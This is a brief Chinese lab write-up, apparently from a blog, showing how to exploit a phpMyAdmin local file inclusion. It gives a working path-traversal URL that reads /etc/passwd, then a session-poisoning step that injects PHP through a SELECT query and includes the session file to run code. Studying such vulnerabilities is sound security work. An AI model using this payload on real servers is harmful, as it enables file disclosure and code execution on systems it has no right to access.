环境搭建好开始干
进去phpmyadmin后先试试
http://172.17.0.1:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
如图
4.jpg

利用方式也比较简单,可以执行一下SELECT '<?=phpinfo()?>';,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可:
5.jpg

然后包含session就行
6.jpg

preView